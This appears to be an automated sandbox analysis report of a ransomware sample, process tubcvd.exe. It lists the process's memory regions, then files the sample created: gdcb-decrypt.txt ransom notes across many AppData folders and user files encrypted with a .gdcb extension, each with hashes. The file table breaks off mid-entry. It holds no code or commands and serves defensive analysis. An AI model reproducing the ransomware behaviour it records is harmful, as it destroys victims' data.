pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000210000 0x00210000 0x00210fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000220000 0x00220000 0x00231fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000220000 0x00220000 0x00220fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000220000 0x00220000 0x00223fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000230000 0x00230000 0x00230fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
private_0x0000000000230000 0x00230000 0x00233fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000240000 0x00240000 0x00245fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000240000 0x00240000 0x00240fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x00290000 0x0034dfff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000000350000 0x00350000 0x0038ffff Private Memory Readable, Writable True False False
  • Region Actions
tubcvd.exe 0x00400000 0x00426fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000570000 0x00570000 0x0066ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000670000 0x00670000 0x007f7fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000800000 0x00800000 0x008dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000800000 0x00800000 0x0087ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000800000 0x00800000 0x0083ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000870000 0x00870000 0x0087ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000880000 0x00880000 0x008bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000008d0000 0x008d0000 0x008dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000008e0000 0x008e0000 0x008effff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000008f0000 0x008f0000 0x00a70fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000a80000 0x00a80000 0x01e7ffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001e80000 0x01e80000 0x01f7ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000001f80000 0x01f80000 0x02037fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000002040000 0x02040000 0x020bffff Private Memory Readable, Writable True False False
  • Region Actions
sortdefault.nls 0x020c0000 0x023f6fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002500000 0x02500000 0x025fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002600000 0x02600000 0x026fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002700000 0x02700000 0x027fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002800000 0x02800000 0x0283ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002840000 0x02840000 0x0293ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002940000 0x02940000 0x0297ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002980000 0x02980000 0x02a7ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002a80000 0x02a80000 0x02abffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002ac0000 0x02ac0000 0x02bbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002bc0000 0x02bc0000 0x02bfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002c00000 0x02c00000 0x02cfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002d00000 0x02d00000 0x02d3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002d40000 0x02d40000 0x02e3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002e40000 0x02e40000 0x02e7ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002e80000 0x02e80000 0x02f7ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002f80000 0x02f80000 0x02fbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002fc0000 0x02fc0000 0x030bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000030c0000 0x030c0000 0x030fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003100000 0x03100000 0x031fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003200000 0x03200000 0x0323ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003240000 0x03240000 0x0333ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003340000 0x03340000 0x0337ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003380000 0x03380000 0x0347ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003480000 0x03480000 0x034bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000034c0000 0x034c0000 0x035bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000035c0000 0x035c0000 0x035fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003600000 0x03600000 0x036fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003700000 0x03700000 0x0373ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003740000 0x03740000 0x0383ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003840000 0x03840000 0x0387ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003880000 0x03880000 0x0397ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003980000 0x03980000 0x039bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000039c0000 0x039c0000 0x03abffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003ac0000 0x03ac0000 0x03afffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003b00000 0x03b00000 0x03bfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003c00000 0x03c00000 0x03c3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003c40000 0x03c40000 0x03d3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003d40000 0x03d40000 0x03d7ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003d80000 0x03d80000 0x03e7ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003e80000 0x03e80000 0x03ebffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003ec0000 0x03ec0000 0x03fbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003fc0000 0x03fc0000 0x03ffffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004000000 0x04000000 0x040fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004100000 0x04100000 0x0413ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004140000 0x04140000 0x0423ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004240000 0x04240000 0x0427ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004280000 0x04280000 0x0437ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004380000 0x04380000 0x043bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000043c0000 0x043c0000 0x044bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000044c0000 0x044c0000 0x044fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004500000 0x04500000 0x045fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004600000 0x04600000 0x0463ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004640000 0x04640000 0x0473ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004740000 0x04740000 0x0477ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004780000 0x04780000 0x0487ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004880000 0x04880000 0x048bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000048c0000 0x048c0000 0x049bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000049c0000 0x049c0000 0x049fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004a00000 0x04a00000 0x04afffff Private Memory Readable, Writable True False False
  • Region Actions
wow64.dll 0x73cd0000 0x73d1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73d20000 0x73d27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73d30000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dwmapi.dll 0x73f50000 0x73f6cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
uxtheme.dll 0x73f70000 0x73fe4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcr100.dll 0x74200000 0x742befff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x742c0000 0x744e3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msimg32.dll 0x744f0000 0x744f5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74500000 0x74558fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74560000 0x74569fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x74570000 0x7458dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x745b0000 0x74725fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x74730000 0x74772fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x74780000 0x7486ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x748c0000 0x749dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
combase.dll 0x749e0000 0x74b99fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x74ba0000 0x74c4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x74c90000 0x74d0afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
crypt32.dll 0x74d10000 0x74e84fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
powrprof.dll 0x74ef0000 0x74f33fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x75100000 0x75143fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msasn1.dll 0x751f0000 0x751fdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shcore.dll 0x75260000 0x752ecfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel.appcore.dll 0x75650000 0x7565bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x75660000 0x757acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
windows.storage.dll 0x757b0000 0x75c8cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x75c90000 0x7704efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x77050000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x771f0000 0x7721afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x77230000 0x7723efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x773a0000 0x7745dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77460000 0x775d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007fe50000 0x7fe50000 0x7fe52fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007fe53000 0x7fe53000 0x7fe55fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007fe56000 0x7fe56000 0x7fe58fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7ff9ee76ffff Private Memory Readable True False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ff9ee932000 0x7ff9ee932000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
For performance reasons, the remaining 3387 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\local\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrobat\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\cache\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\toolssearchcacherdr\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrocef\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrocef\dc\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrocef\dc\acrobat\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrocef\dc\acrobat\cache\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrocef\dc\acrobat\cache\cache\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrocef\dc\acrobat\cookie\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\color\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\color\profiles\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\cef\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\cef\user data\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\comms\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\comms\temp\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\comms\unistore\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\comms\unistoredb\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\google\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\google\chrome\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\history\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\history\low\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\clr_v2.0\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\clr_v4.0\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\feeds\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\forms\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\gamedvr\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\office\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\onedrive\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\iconcacherdr.dat.gdcb 52.84 KB (54112 bytes) MD5: 0fc7061e0eb376d2b0acbad381f47fdf
SHA1: fb052b9a5ef4e1615a710bb53f752d37a9419764
SHA256: 406a7bf9b71455f12d35992195d5c07118d73d8859806a5a3e104ded75758464 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\iconcacherdr65536.dat.gdcb 180.28 KB (184608 bytes) MD5: 132bbc930f049894ccea5871ffe84ab8
SHA1: 0a0ddf8b74c5d38f9587157dca9fb33e6750f030
SHA256: 8364e5a9e4410c14a887d43e44d51c1aea63ec5ad44c2c97a718e9ba8580e840 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\usercache.bin.gdcb 62.45 KB (63952 bytes) MD5: bf882920036a75cb92c792306f46e5ec
SHA1: 3375b3ff827228a9f97ee756c354cdfc384886bb
SHA256: 8ab70fe4905f49f8d0d84d2baf791e58cdaa3f63ececf6f63fb5526aeedc32ed 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\armui.ini.gdcb 251.91 KB (257952 bytes) MD5: 3bf4de62d5ecc6299d86cb914df154e4
SHA1: 145d9ca3e2032073ddc3f0a297b10d479025da11
SHA256: eb77ff5b42593075218ff67884a0ada3260a482cf7bb4d8ca1b6393ab5971516 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\peyv.bmp.gdcb 60.72 KB (62176 bytes) MD5: 5e0ad431fc81650f8e806c3a7850912d
SHA1: 41ad042c6e4d239dc3ab5d1e1afedc4d8003e718
SHA256: ee7a9547438b54a799ab81473bcc68618a885979f73f1b7b90168dfd0ca288a9 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\comms\temp\calendarcache.dat.gdcb 0.55 KB (560 bytes) MD5: b4984e476fc4c3f7a877a610e51e45ad
SHA1: 1039877f8c3232b1c992096d5126b634f2c2616c
SHA256: 15f2c4dd846a56bacdd0cdcae19df41307ccfd697e24a68c04b21f5e1c5e902b 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\adobearm.log.gdcb 1.20 KB (1232 bytes) MD5: 5d38e9224946a9e3c203e6c37f5331f7
SHA1: 7ee6a0f0270db05edbf912974c4cfa666d8a9557
SHA256: 6b9dc2d85598d87b21466a4837eac9b31ab7a9478d541dfa307a8a6be8d864a4 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\fy0zs5d.rtf.gdcb 33.83 KB (34640 bytes) MD5: b4376a13dc0ef32795c0cd127aa9ba58
SHA1: bed8ed9bb9da598d3764ac44908d0538dca75db6
SHA256: 7a76fa1378067d4ad893ea72f9fa8fcec388006bd76a89dd139bfbab9ea982b5 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\l0cggz.mkv.gdcb 5.31 KB (5440 bytes) MD5: 44d69685bfe799614b7ce1309bec6c58
SHA1: 2be215eba0ccc3b11c75e4b79b223c5d1f1222e1
SHA256: 4d2d6b0642655be638e53d79303045ca1e067dfc496a38484006452ea244cd3e 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\psxl 1.gif.gdcb 12.66 KB (12960 bytes) MD5: 80d66f640e05a25a0b42763de8a43b32
SHA1: 04d3b9898eb212585493f55f5158f7a165a24f84
SHA256: 8d31229fcec80febf56ba63c94b5fa6ee05465866bdc348171962b14c2ad1eeb 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\u 7qtcnd.flv.gdcb 64.47 KB (66016 bytes) MD5: 32ae09b304230ed8e10ad94d3399eea0
SHA1: d07bcacc187c6db6ecfd29eb2c40a29b07cfe11d
SHA256: da2c885143c02b2ab082607addc717d412f4c0a71ad95f0bda8f104a0db46e51 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\uwup52bz.gif.gdcb 30.61 KB (31344 bytes) MD5: 06c0738b8172a64561722a3286234cc8
